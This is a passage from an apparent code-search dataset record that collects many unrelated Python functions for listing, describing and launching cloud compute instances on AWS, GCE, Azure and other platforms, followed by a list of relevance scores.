[[n.name, n.state, n.public_ips] for n in nodes]", "def create_instances(region_name, app_name, image_name,\n storage_enckey=None,\n s3_logs_bucket=None,\n identities_url=None,\n ssh_key_name=None,\n company_domain=None,\n ldap_host=None,\n instance_type=None,\n security_group_ids=None,\n instance_profile_arn=None,\n subnet_type=SUBNET_PRIVATE,\n subnet_id=None,\n vpc_id=None,\n vpc_cidr=None,\n tag_prefix=None,\n dry_run=False,\n 
template_name=None,\n ec2_client=None,\n **kwargs):\n if not instance_type:\n instance_type = 't3a.micro'\n if not template_name:\n template_name = \"%s-cloud-init-script.j2\" % app_name\n if not ec2_client:\n ec2_client = boto3.client('ec2', region_name=region_name)\n resp = ec2_client.describe_instances(\n Filters=[\n {'Name': 'tag:Name', 'Values': [\"*%s*\" % app_name]},\n {'Name': 'instance-state-name',\n 'Values': [EC2_RUNNING, EC2_STOPPED, EC2_PENDING]}])\n\n instances = None\n instance_ids = []\n stopped_instance_ids = []\n for reserv in resp['Reservations']:\n instances = reserv['Instances']\n for instance in reserv['Instances']:\n names = []\n for tag in instance['Tags']:\n if tag['Key'] == 'Name':\n names = [name.strip() for name in tag['Value'].split(',')]\n break\n if app_name not in names:\n continue\n instance_ids += [instance['InstanceId']]\n if instance['State']['Name'] == EC2_STOPPED:\n stopped_instance_ids += [instance['InstanceId']]\n if stopped_instance_ids:\n ec2_client.start_instances(\n InstanceIds=stopped_instance_ids,\n DryRun=dry_run)\n LOGGER.info(\"%s restarted instances %s for '%s'\",\n tag_prefix, stopped_instance_ids, app_name)\n if instance_ids:\n LOGGER.info(\"%s found instances %s for '%s'\",\n tag_prefix, instance_ids, app_name)\n # If instances are running and there is a message queue,\n # we assume the infrastructure for this app is ready to accept\n # containers.\n return instances\n\n search_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), 'templates')\n template_loader = jinja2.FileSystemLoader(searchpath=search_path)\n template_env = jinja2.Environment(loader=template_loader)\n template = template_env.get_template(template_name)\n user_data = template.render(\n logs_storage_location=\"s3://%s\" % s3_logs_bucket,\n identities_url=identities_url,\n remote_drop_repo=\"https://github.com/djaodjin/drop.git\",\n company_domain=company_domain,\n ldap_host=ldap_host,\n **kwargs)\n\n # Find the ImageId\n image_id = _get_image_id(\n image_name, instance_profile_arn=instance_profile_arn,\n ec2_client=ec2_client, region_name=region_name)\n\n if not storage_enckey:\n # Always make sure the EBS storage is encrypted.\n storage_enckey = _get_or_create_storage_enckey(\n region_name, tag_prefix, dry_run=dry_run)\n\n block_devices = [\n {\n # `DeviceName` is required and must match expected name otherwise\n # an extra disk is created.\n 'DeviceName': '/dev/xvda', # XXX '/dev/sda1',\n #'VirtualName': 'string',\n # https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-volume-types.html\n 'Ebs': {\n 'DeleteOnTermination': False,\n #'Iops': 100, # 'not supported for gp2'\n #'SnapshotId': 'string',\n 'VolumeSize': 8,\n 'VolumeType': 'gp2'\n },\n #'NoDevice': 'string'\n },\n ]\n if storage_enckey:\n # XXX Haven't been able to use the key we created but the default\n # aws/ebs is OK...\n for block_device in block_devices:\n block_device['Ebs'].update({\n 'KmsKeyId': storage_enckey,\n 'Encrypted': True\n })\n\n network_interfaces = [{\n 'DeviceIndex': 0,\n 'SubnetId': subnet_id,\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n 'Groups': security_group_ids\n }]\n if not subnet_id:\n if not vpc_id:\n vpc_id, _ = _get_vpc_id(tag_prefix, ec2_client=ec2_client,\n region_name=region_name)\n web_subnet_cidrs, dbs_subnet_cidrs, app_subnet_cidrs = _split_cidrs(\n vpc_cidr, ec2_client=ec2_client, region_name=region_name)\n if subnet_type == SUBNET_PRIVATE:\n app_subnet_by_cidrs = _get_subnet_by_cidrs(\n app_subnet_cidrs, 
tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(app_subnet_by_cidrs.values()))['SubnetId']\n elif subnet_type == SUBNET_DBS:\n dbs_subnet_by_cidrs = _get_subnet_by_cidrs(\n dbs_subnet_cidrs, tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(dbs_subnet_by_cidrs.values()))['SubnetId']\n elif subnet_type in [SUBNET_PUBLIC_READY, SUBNET_PUBLIC]:\n web_subnet_by_cidrs = _get_subnet_by_cidrs(\n web_subnet_cidrs, tag_prefix,\n vpc_id=vpc_id, ec2_client=ec2_client)\n # Use first valid subnet.\n subnet_id = next(iter(web_subnet_by_cidrs.values()))['SubnetId']\n if subnet_type == SUBNET_PUBLIC:\n network_interfaces = [{\n 'AssociatePublicIpAddress': True,\n 'DeviceIndex': 0,\n 'SubnetId': subnet_id,\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n 'Groups': security_group_ids\n }]\n\n if not instances or not instance_ids:\n for _ in range(0, NB_RETRIES):\n # The IAM instance profile take some time to be visible.\n try:\n # Cannot use `SecurityGroups` with `SubnetId`\n # but can use `SecurityGroupIds`.\n resp = ec2_client.run_instances(\n BlockDeviceMappings=block_devices,\n ImageId=image_id,\n KeyName=ssh_key_name,\n InstanceType=instance_type,\n MinCount=1,\n MaxCount=1,\n#botocore.exceptions.ClientError: An error occurred (InvalidParameterCombination) when calling the RunInstances operation: Network interfaces and an instance-level subnet ID may not be specified on the same request\n# SubnetId=subnet_id,\n# SecurityGroupIds=security_group_ids,\n IamInstanceProfile={'Arn': instance_profile_arn},\n NetworkInterfaces=network_interfaces,\n TagSpecifications=[{\n 'ResourceType': \"instance\",\n 'Tags': [{\n 'Key': 'Name',\n 'Value': app_name\n }, {\n 'Key': 'Prefix',\n 'Value': tag_prefix\n }]\n }],\n UserData=user_data,\n DryRun=dry_run)\n instances = resp['Instances']\n instance_ids = [\n instance['InstanceId'] for instance in instances]\n break\n except botocore.exceptions.ClientError as err:\n if not err.response.get('Error', {}).get(\n 'Code', 'Unknown') == 'InvalidParameterValue':\n raise\n LOGGER.info(\"%s waiting for IAM instance profile %s to be\"\\\n \" operational ...\", tag_prefix, instance_profile_arn)\n time.sleep(RETRY_WAIT_DELAY)\n LOGGER.info(\"%s started instances %s for '%s'\",\n tag_prefix, instance_ids, app_name)\n for _ in range(0, NB_RETRIES):\n # It can take some time before the instances will appear\n # in a `describe_instances` call. 
We want to make sure\n # not to get errors later on if we execute too fast.\n try:\n resp = ec2_client.describe_instances(InstanceIds=instance_ids)\n break\n except botocore.exceptions.ClientError as err:\n err_code = err.response.get('Error', {}).get('Code', 'Unknown')\n LOGGER.error(\"XXX err_code=%s\", err_code)\n if not err_code == 'InvalidInstanceID.NotFound':\n raise\n LOGGER.info(\"%s waiting for EC2 instances %s to be\"\\\n \" operational ...\", tag_prefix, instance_ids)\n time.sleep(RETRY_WAIT_DELAY)\n\n return instances", "def get_instances(ebs_support: str) -> Dict[str, str]:\n results = {}\n paginator = EC2_CLIENT.get_paginator(\"describe_instance_types\")\n resp_itr = paginator.paginate(\n Filters=[{\"Name\": \"ebs-info.ebs-optimized-support\", \"Values\": [ebs_support]}],\n )\n\n _type = \"false\" if ebs_support == \"unsupported\" else \"true\"\n for instances in resp_itr:\n for inst in instances.get(\"InstanceTypes\"):\n results[inst[\"InstanceType\"]] = _type\n return results", "def list_instances(self):\n LOG.debug(\"list_instances\")\n\n instance_ids = []\n bmms = db.bmm_get_all(None)\n for bmm in bmms:\n if not bmm[\"instance_id\"]:\n continue\n instance_ids.append(self._instance_id_to_name(bmm[\"instance_id\"]))\n\n return instance_ids", "def aws_instance(LOGGER, VM, TERRAFORM_SECURITY_GROUPS):\n VM_INFO = dict()\n LOGGER.info('Adding %s: %s to inventory.' %\n (VM['data_type'], VM['inventory_hostname']))\n\n VM_INFO.update(\n {\n 'inventory_hostname': VM['inventory_hostname'],\n 'ami': VM['ami'],\n 'data_type': VM['data_type'],\n 'ansible_groups': VM['ansible_groups'],\n 'availability_zone': VM['availability_zone'],\n 'instance_type': VM['instance_type'],\n 'key_name': VM['key_name'],\n 'network_interface_id': VM['network_interface_id'],\n 'private_dns': VM['private_dns'],\n 'private_ip': VM['private_ip'],\n 'public_dns': VM['public_dns'],\n 'public_ip': VM['public_ip'],\n 'subnet_id': VM['subnet_id'],\n 'target': VM['target'],\n 'vpc_security_group_ids': VM['vpc_security_group_ids']\n }\n )\n\n for VPC_SECURITY_GROUP_ID in VM['vpc_security_group_ids']:\n for SECURITY_GROUP in TERRAFORM_SECURITY_GROUPS:\n if SECURITY_GROUP['id'] == VPC_SECURITY_GROUP_ID:\n VM_INFO.update(\n {\n 'vpc_security_groups':\n SECURITY_GROUP['security_groups']\n }\n )\n\n return VM_INFO", "def list(self, filters: dict = None, state: str = None, exclude: str = None) -> list:\n date_format = '%Y-%m-%d %H:%M:%S'\n self.instances = self.ec2.instances.all()\n\n # TOREMOVE\n def __all_instances():\n # all instances without filtering\n self.instances = [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]\n\n if state:\n try:\n self.instances = self.instances.filter(Filters=[{'Name': 'instance-state-name', 'Values': [state]}])\n except IOError as e:\n raise EC2Error('Error listing instances by state {0} {1}'.format(state, e))\n\n if filters:\n # convert string into dict\n filters = literal_eval(filters)\n try:\n if not self.instances:\n self.instances = self.ec2.instances.all()\n\n self.instances = self.instances.filter(Filters=[{'Name': filters['Name'], 'Values': filters['Values']}])\n except IOError as e:\n raise EC2Error('Error listing instances with filters {0} {1}'.format(filters, e))\n\n if exclude:\n instances = []\n for i in self.instances:\n if i.id not in 
exclude:\n instances.append(i)\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in instances\n ]\n else:\n return [\n {\n 'InstanceId': instance.id,\n 'State': instance.state['Name'],\n 'Type': instance.instance_type,\n 'VpcId': instance.vpc_id,\n 'KeyName': instance.key_name,\n 'Tags': instance.tags,\n 'StartedAt': instance.launch_time.strftime(date_format)\n }\n for instance in self.instances\n ]", "def get_simplified_tags(self) -> Dict:\n return self.orthanc.get_instance_simplified_tags(self.identifier)", "def _get_running_ec2_instances(theargs):\n mapstr = ''\n if theargs.profile is not None:\n boto3.setup_default_session(profile_name=theargs.profile)\n ec2 = boto3.client('ec2', region_name='us-west-2')\n\n response = ec2.describe_regions()\n for region in response['Regions']:\n rname = region['RegionName']\n sys.stdout.write('Running ec2 query in region: ' + rname + '\\n')\n ec2 = boto3.client('ec2', region_name=rname)\n mapstr += 'Region: ' + rname + '\\n'\n respy = ec2.describe_instances()\n for reso in respy['Reservations']:\n for entry in reso['Instances']:\n namey = ''\n try:\n for keyval in entry['Tags']:\n if keyval['Key'] == 'Name':\n namey = keyval['Value']\n break\n except KeyError:\n pass\n\n mapstr += ('\\t\\t' + entry['PublicDnsName'] + '\\n' +\n '\\t\\tLaunch Date: ' + str(entry['LaunchTime']) +\n '\\n' + \n '\\t\\tId: ' + entry['InstanceId'] + '\\n' +\n '\\t\\tType: ' + entry['InstanceType'] + '\\n' +\n '\\t\\tName: ' + namey + '\\n' +\n '\\t\\tState: ' + entry['State']['Name'] + '\\n\\n')\n sys.stdout.write('\\nResults:\\n\\n')\n return mapstr", "def yield_instances(self, instance_filter=None):\n if instance_filter and set(\"\\\"\\\\'\").intersection(instance_filter):\n raise ValueError('Invalid instance filter: %s' % instance_filter)\n page_token = None\n while True:\n params = {'maxResults': 250}\n if instance_filter:\n params['filter'] = 'name eq \"%s\"' % instance_filter\n if page_token:\n params['pageToken'] = page_token\n resp = self.call_api('/aggregated/instances', params=params, deadline=120)\n items = resp.get('items', {})\n for zone in sorted(items):\n for instance in items[zone].get('instances', []):\n yield instance\n page_token = resp.get('nextPageToken')\n if not page_token:\n break", "def get_volumes(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_volumes = conn.get_all_volumes()\n except boto.exception.EC2ResponseError:\n return [] # This better not fail silently or I'll cut a person.\n return region_volumes", "def _process_instance(self, instance):\n instance_dict = {}\n ins_zone = instance[\"zone\"]\n instance_dict[\"zone\"] = ins_zone[\n ins_zone.index(\"zones/\") + 6:len(ins_zone)]\n instance_dict[\"name\"] = instance[\"name\"]\n instance_dict[\"cloud\"] = self.kind\n instance_dict[\"status\"] = instance[\"status\"]\n instance_dict[\"type\"] = instance[\"cpuPlatform\"]\n instance_dict[\"created\"] = instance[\"creationTimestamp\"]\n instance_dict[\"id\"] = instance[\"id\"]\n instance_dict[\"kind\"] = instance[\"kind\"]\n machineTypeUrl = instance[\"machineType\"]\n instance_dict[\"machineType\"] = machineTypeUrl[machineTypeUrl.index(\n \"machineTypes/\") + 13:len(machineTypeUrl)]\n disks = instance[\"disks\"]\n disk = disks[0]\n instance_dict[\"deviceName\"] = disk[\"deviceName\"]\n 
instance_dict[\"diskSizeGb\"] = disk[\"diskSizeGb\"]\n licenses = disk[\"licenses\"][0]\n instance_dict[\"sourceImage\"] = licenses[\n licenses.index(\"licenses/\") + 9:len(\n licenses)]\n instance_dict[\"diskType\"] = disk[\"type\"]\n instance_dict[\"mode\"] = disk[\"mode\"]\n instance_dict[\"modified\"] = str(DateTime.now())\n\n # Network access.\n network_config = instance[\"networkInterfaces\"]\n\n if (network_config):\n network_config = network_config[0]\n access_config = network_config[\"accessConfigs\"]\n access_config = access_config[0]\n external_ip = access_config[\"natIP\"]\n instance_dict[\"public_ip\"] = external_ip\n\n return instance_dict", "def get_used_instances(self, instance):\n\n instances = list()\n\n for el in self.net_root.iter('block'):\n inst = el.attrib['instance']\n if instance in inst:\n if len(el.getchildren()) != 0:\n instances.append(get_root_cluster(el).attrib['name'])\n\n return instances", "def list_instance_name():\n\n if request.method == \"GET\":\n with lock:\n names = list(instances.keys())\n return jsonify(names)\n return Response(status=200)", "def get_virtual_servers(configuration: Configuration,\r\n resource_group_id: str = None,\r\n name: str = None,\r\n vpc_id: str = None,\r\n vpc_name: str = None,\r\n vpc_crn: str = None) -> Dict[str, Any]:\r\n service = create_ibmcloud_api_client(configuration)\r\n try:\r\n instances = \\\r\n service.list_instances(resource_group_id=resource_group_id, name=name, vpc_id=vpc_id, vpc_crn=vpc_crn,\r\n vpc_name=vpc_name).get_result()['instances']\r\n except ApiException as e:\r\n logger.error(\"List instances failed with status code \" +\r\n str(e.code) + \": \" + e.message)\r\n return instances", "def instances(self):\n from office365.outlook.calendar.events.collection import EventCollection\n return self.properties.get('instances',\n EventCollection(self.context, ResourcePath(\"instances\", self.resource_path)))", "def describe_rds_instances(rds, account, region, output_bucket):\n rds_list = rds.describe_db_instances().get('DBInstances')\n\n for rds_obj in rds_list:\n #print rds_obj\n output_bucket.append(misc.format_line((\n misc.check_if(account.get('name')),\n misc.check_if(region.get('RegionName')),\n misc.check_if(rds_obj.get('DBSubnetGroup').get('VpcId')),\n misc.check_if(rds_obj.get('DBInstanceIdentifier')),\n misc.check_if(rds_obj.get('DBInstanceClass')),\n misc.check_if(str(rds_obj.get('PubliclyAccessible'))),\n misc.check_if(rds_obj.get('Endpoint').get('Address')),\n misc.lookup(rds_obj.get('Endpoint').get('Address')),\n misc.check_if(str(rds_obj.get('Endpoint').get('Port')))\n )))", "def load_instances_tags(instance_id=None):\n loader = TagLoader(override_instance_id=instance_id)\n return loader.load_tags()", "def get_snapshots(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_snapshots = conn.get_all_snapshots(owner='self')\n except boto.exception.EC2ResponseError:\n return []\n return region_snapshots", "def describe_instances():\n # Instantiate the service resource object\n ec2_resource = session.resource('ec2', region_name=region)\n # Describe instances\n instances = ec2_resource.instances.all()\n for instance in instances:\n print('State of the instance \"' + instance.id + '\" is: \"' + instance.state['Name'] + '\"')\n return", "def get_instances(dbpath):\n odb = openOdb(path=dbpath)\n _instances = []\n for _name,_inst in odb.rootAssembly.instances.items():\n _nodes = len(_inst.nodes)\n _elements = len(_inst.elements)\n 
_instances.append((_name,_nodes,_elements))\n return _instances", "def list_ebss_by_instance():\n\n ec2 = u.create_ec2_resource()\n instances = [(u.seconds_from_datetime(i.launch_time), i) for i in ec2.instances.all()]\n sorted_instances = sorted(instances, key=itemgetter(0))\n\n for (seconds, instance) in sorted_instances:\n\n volumes = instance.volumes.all()\n volume_strs = []\n for v in volumes:\n volume_strs.append(\"%s (%s)\"%(v.id, v.size))\n print(\"%s: %s\" % (u.get_name(instance.tags), ','.join(volume_strs)))", "def list_instances(self):\n # list instances\n self._list_instances()", "def instances(self, alwaysIncludeEmail=None, maxAttendees=None,\r\n maxResults=None, originalStart=None, pageToken=None,\r\n showDeleted=None, timeZone=None):\r\n params = base.get_params(None, locals())\r\n url = '{0}/instances'.format(self.get_url())\r\n request = http.Request('GET', url, params)\r\n\r\n return request, parsers.parse_json", "def reserved_compare(options):\n running_instances = defaultdict(dict)\n reserved_purchases = defaultdict(dict)\n regions = boto.ec2.regions()\n good_regions = [r for r in regions if r.name not in ['us-gov-west-1',\n 'cn-north-1']]\n for region in good_regions:\n if options.trace:\n print \" Scanning region {0}\".format(region.name)\n conn = region.connect()\n filters = {'instance-state-name': 'running'}\n zones = defaultdict(dict)\n\n if options.trace:\n print \" Fetching running instances\"\n reservations = conn.get_all_instances(filters=filters)\n for reservation in reservations:\n for inst in reservation.instances:\n if options.debug:\n print instance_string(inst, options, verbose=True)\n if inst.state != 'running':\n if options.debug:\n print \"Skip {0.id} state {0.state}\".format(inst)\n continue\n if inst.spot_instance_request_id:\n if options.debug:\n print \"Skip {0.id} has spot id {0.spot_instance_request_id}\".format(inst)\n continue\n if 'aws:autoscaling:groupName' in inst.tags:\n if options.debug:\n print \"Skip {0.id} is an autoscale instance\".format(inst)\n continue\n if inst.platform == 'Windows' or inst.platform == 'windows':\n if options.debug:\n print \"Skip {0.id} has platform {0.platform}\".format(inst)\n continue\n if inst.instance_type not in zones[inst.placement]:\n zones[inst.placement][inst.instance_type] = []\n zones[inst.placement][inst.instance_type].append(inst)\n\n if zones:\n running_instances[region.name] = zones\n\n purchased = defaultdict(dict)\n if options.trace:\n print \" Fetching reservations\"\n\n reserved = conn.get_all_reserved_instances()\n for r in reserved:\n if options.debug:\n print reservation_string(r, verbose=True)\n if r.state != 'active':\n continue\n if r.instance_tenancy != 'default':\n print 'WARNING: Non-default tenancy %s: %s' % (r.instance_tenancy, reservation_string(r))\n continue\n if r.instance_type not in purchased[r.availability_zone]:\n purchased[r.availability_zone][r.instance_type] = [r]\n else:\n purchased[r.availability_zone][r.instance_type].append(r)\n\n if purchased:\n reserved_purchases[region.name] = purchased\n\n return check_reservation_use(options, running_instances,\n reserved_purchases)", "def list_instances(self):\n instances = []\n try:\n pages = self.compute.virtual_machines.list(\n CONF.azure.resource_group)\n except Exception as e:\n msg = six.text_type(e)\n LOG.exception(msg)\n ex = exception.InstanceListFailure(reason=six.text_type(e))\n raise ex\n else:\n if pages:\n for i in pages:\n instances.append(i.name)\n return instances", "def _create_load_stats(self, context, 
instance=None):\n values = {}\n\n if instance:\n instances = [instance]\n else:\n self.stats.clear() # re-generating all, so clear old stats\n\n # grab all instances that are not yet DELETED\n filters = {'host': self.host, 'deleted': False}\n instances = db.instance_get_all_by_filters(context,\n {'host': self.host})\n\n for instance in instances:\n self.stats.add_stats_for_instance(instance)\n\n values['current_workload'] = self.stats.calculate_workload()\n values['running_vms'] = self.stats.num_instances\n values['vcpus_used'] = self.stats.num_vcpus_used\n values['stats'] = self.stats\n return values", "def _get_available_regions():\n session = boto3.session.Session()\n\n return session.get_available_regions(service_name='s3')", "def generateInfoInstances(regions):\n print \"Writing instances info to output file %s\" % instances_data_output_file\n with open(instances_data_output_file, 'w') as f3:\n f3.write(\"INSTANCES\\n\")\n f3.write(\"Name\\tinstance ID\\tKEEP-tag\\tproduction\\tinstance_type\\tstate\\tlaunched\\tsecurity_groups\\tregion\\n\\n\")\n for region in regions:\n print \".\" # feedback for user\n instances = getInstances(region)\n for i in instances:\n f3.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\"\n % (get_name_tag(i), i.id, getKeepTag(i), isProduction(i), i.instance_type, i.state,\n i.launch_time, getGroups(i), i.region.name))", "def get_list(self, regions = None):\n\n dataInSavedData = False\n if regions == None:\n regions = [\"PHA\", \"STC\", \"JHC\", \"PLK\", \"KVK\", \"ULK\", \"LBK\", \"HKK\", \"PAK\", \"OLK\", \"MSK\", \"JHM\", \"ZLK\", \"VYS\"]\n\n FinalNpArrayList = [[] for i in range(65)]\n\n self.duplicate_handling = []\n\n #For every region:\n for region in regions:\n #gets duplicity of data and deletes them\n if region in self.duplicate_handling:\n print(\"ERROR: duplicitni predani kraje: \" + region + \", data nebyla prevzata podruhe\", file=sys.stderr)\n continue\n else:\n self.duplicate_handling.append(region)\n\n #Gets data of region from instance of class\n if self.saved_data:\n for key in self.saved_data:\n if key == region:\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x],self.saved_data[region][1][x]), axis=None)\n dataInSavedData = True\n break\n\n #if instance of class do not have data of region,\n #check if file .pkl.gz of region exists and gets data from it,\n #if not, gets data from parse_region_data function,\n #creates file .pkl.gz of region and saves data into isntance of class:\n if not dataInSavedData:\n PickleExists = True\n try:\n self.saved_data[region] = pickle.load(gzip.open(self.folder + \"/\" + self.cache_filename.format(region),'rb'))\n except FileNotFoundError:\n PickleExists = False\n\n if not PickleExists:\n data = self.parse_region_data(region)\n\n if data == None:\n continue\n\n with gzip.open(self.folder + \"/\" + self.cache_filename.format(region),'wb') as f:\n pickle.dump(data, f)\n self.saved_data[region] = data\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x], self.saved_data[region][1][x]), axis=None)\n else:\n for x in range(len(FinalNpArrayList)):\n FinalNpArrayList[x] = np.concatenate((FinalNpArrayList[x], self.saved_data[region][1][x]), axis=None)\n\n return (self.headers, FinalNpArrayList)", "def get_region_dict(self):\n if self.initiated is False:\n raise RuntimeError(\"Initiate first\")\n\n return self._region_dict", "def list_instance_uuids(self):\n return self.list_instances()", "def 
list_foundation_sdk_instances():\n return jsonify([serialise_instance(instance) for instance in STORE.values() if instance.entity == SDK_ENTITY_NAME])", "def _get_vm_ids_and_names_dict(self):\r\n vm_ids = {}\r\n vm_names = {}\r\n\r\n for content in self.content:\r\n if content['type'].lower() in ('vm', 'virtual machine'):\r\n vm_ids[content['id']] = content['display_name']\r\n vm_names[content['display_name']] = content['id']\r\n\r\n return vm_ids, vm_names", "def _get_data_volumes(vm_):\n ret = []\n volumes = vm_[\"volumes\"]\n for key, value in volumes.items():\n # Verify the required 'disk_size' property is present in the cloud\n # profile config\n if \"disk_size\" not in volumes[key].keys():\n raise SaltCloudConfigError(\n \"The volume '{}' is missing 'disk_size'\".format(key)\n )\n # Use 'HDD' if no 'disk_type' property is present in cloud profile\n if \"disk_type\" not in volumes[key].keys():\n volumes[key][\"disk_type\"] = \"HDD\"\n\n # Construct volume object and assign to a list.\n volume = Volume(\n name=key,\n size=volumes[key][\"disk_size\"],\n disk_type=volumes[key][\"disk_type\"],\n licence_type=\"OTHER\",\n )\n\n # Set volume availability zone if defined in the cloud profile\n if \"disk_availability_zone\" in volumes[key].keys():\n volume.availability_zone = volumes[key][\"disk_availability_zone\"]\n\n ret.append(volume)\n\n return ret", "def get_instances_ids(self):\n reservations = self.__get_reservations()\n instances_ids = []\n instances,_ = self.__get_multi_instances(reservations)\n for instance in instances:\n instances_ids.append(instance.id.encode(\"latin-1\"))\n return instances_ids", "def GetInstanceTags(self, instance, reason=None):\n query = []\n _AppendReason(query, reason)\n return self._SendRequest(HTTP_GET,\n (\"/%s/instances/%s/tags\" %\n (GANETI_RAPI_VERSION, instance)), query, None)", "def get_instance_list():\n return parse_list_output(Popen('nova list --all-tenants'.split(),\n stdout=STDOUT, stderr=STDERR).communicate()[0])", "def list_(args):\n\n # Get Config.py\n cloud = get_current_cloud(args.cloud)\n\n instances = cloud.list_instances()\n print_table(print_instance_summary, headers, instances,\n use_color=args.color)\n return instances", "def get_instance_definitions(cls):\n\n definitions = {}\n for instance in cls._instances:\n for name, nodes in instance._namespace.items():\n if not definitions.has_key(name):\n definitions[name] = []\n for node in nodes:\n definitions[name].append(node)\n return definitions", "def scope(self) -> List[Region]:\n return [self]", "def get_images(self, region):\n try:\n conn = ec2.connect_to_region(region, **self.credentials)\n region_images = conn.get_all_images(owners=['self'])\n except boto.exception.EC2ResponseError:\n return []\n return region_images", "def get_ec2(self, name: str) -> list:\n filters = [\n {\n 'Name': 'tag:Name',\n 'Values': [name]\n },\n {\n 'Name': 'instance-state-name',\n 'Values': ['running']\n }\n ]\n\n return list(self.ec2.instances.filter(Filters=filters).all())", "def instances(self, endpoint_name=None):\n if endpoint_name is None:\n _, body = self.request('/v1.1/endpoint/instances', 'GET')\n else:\n _, body = self.request('/v1.1/endpoints/%s/instances' % endpoint_name, 'GET')\n return body", "def GetInstances(self, bulk=False, reason=None):\n query = []\n _AppendIf(query, bulk, (\"bulk\", 1))\n _AppendReason(query, reason)\n\n instances = self._SendRequest(HTTP_GET,\n \"/%s/instances\" % GANETI_RAPI_VERSION,\n query, None)\n if bulk:\n return instances\n else:\n return [i[\"id\"] for i in 
instances]", "def region(self, args):\n m = MessageClass()\n print('123124')\n data = {'list': []}\n data['list'].append({\"Region_Name\": \"us-east-1\"})\n data['list'].append({\"Region_Name\": \"us-east-2\"})\n data['list'].append({\"Region_Name\": \"us-west-1\"})\n data['list'].append({\"Region_Name\": \"us-west-2\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-northeast-2\"})\n data['list'].append({\"Region_Name\": \"ap-south-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ap-southeast-1\"})\n data['list'].append({\"Region_Name\": \"ca-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-central-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-1\"})\n data['list'].append({\"Region_Name\": \"eu-west-2\"})\n data['list'].append({\"Region_Name\": \"eu-west-3\"})\n data['list'].append({\"Region_Name\": \"sa-east-1\"})\n m.data = data\n return m.to_json()", "def get_instances(self, group_name, state_filter=None):\n all = self.ec2Connection.get_all_instances()\n instances = []\n for res in all:\n for group in res.groups:\n if group.id == group_name:\n for instance in res.instances:\n if state_filter == None or instance.state == state_filter:\n instances.append(instance)\n return instances" ]
[ "0.72672004", "0.71622515", "0.68902445", "0.68787754", "0.68357", "0.6603997", "0.6595504", "0.6591907", "0.6584421", "0.6475704", "0.6437322", "0.64160633", "0.63718474", "0.63532615", "0.63506424", "0.63015544", "0.62685406", "0.6161752", "0.6136149", "0.61351824", "0.6126755", "0.60812336", "0.60655797", "0.6022264", "0.60089386", "0.6004393", "0.59942245", "0.59898496", "0.589123", "0.5883361", "0.5872661", "0.58603036", "0.58541673", "0.58457583", "0.5800268", "0.5796591", "0.57805395", "0.5771713", "0.5770449", "0.5766193", "0.5765094", "0.5762233", "0.5756913", "0.57436", "0.57239014", "0.57138705", "0.5705296", "0.56984186", "0.5686035", "0.5685059", "0.56745887", "0.56660414", "0.56640476", "0.5640612", "0.56383765", "0.5626591", "0.5625485", "0.5609489", "0.5598227", "0.5591589", "0.55834985", "0.55668974", "0.55594516", "0.55568403", "0.5539593", "0.5517349", "0.551613", "0.55136704", "0.5512358", "0.54930216", "0.5469659", "0.5467906", "0.54613376", "0.54598606", "0.54404896", "0.54348963", "0.5433849", "0.54322267", "0.54106873", "0.5406872", "0.5398262", "0.53973716", "0.5397213", "0.5384921", "0.5383222", "0.53539944", "0.5353202", "0.53494126", "0.5349383", "0.53447384", "0.53371674", "0.53320545", "0.5328319", "0.53214735", "0.5321038", "0.53162163", "0.5308049", "0.53077346", "0.5306974", "0.5306884" ]
0.7885678
0
retrieve list of AMIs that refer to a given snapshot
def getAmisOf(snapshot, images):
    amis = []
    for im in images:
        snapshotsOfThisIm = getSnapshotsOf(im)
        for soti in snapshotsOfThisIm:
            if soti == snapshot.id:
                amis.append(im)
    return amis
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_amis_of(snapshot_id):\n mes_amis = []\n # There has GOT to be a better way. Hmm... maybe not\n keys = Ims.spreadsheet.keys()\n for key in keys:\n if snapshot_id in Ims.spreadsheet[key]['associated_snapshots']:\n mes_amis.append(key)\n return mes_amis", "def getSnapshotsOf(image):\n snapshotIds = []\n deviceMapping = image.block_device_mapping # dict of devices\n devices = deviceMapping.keys()\n for d in devices:\n snapshotId = deviceMapping[d].snapshot_id\n if snapshotId is not None:\n snapshotIds.append(snapshotId.encode())\n return snapshotIds", "def get_snapshots_of(image):\n snapshot_ids = []\n device_mapping = image.block_device_mapping # dict of devices\n devices = device_mapping.keys()\n for device in devices:\n if device_mapping[device].snapshot_id is not None:\n snapshot_ids.append(device_mapping[device].snapshot_id.encode()) # do I need to have 'encode' here?\n return snapshot_ids", "def vm_snapshotlist(args):\n snapshot = args.snapshot\n name = args.name\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, 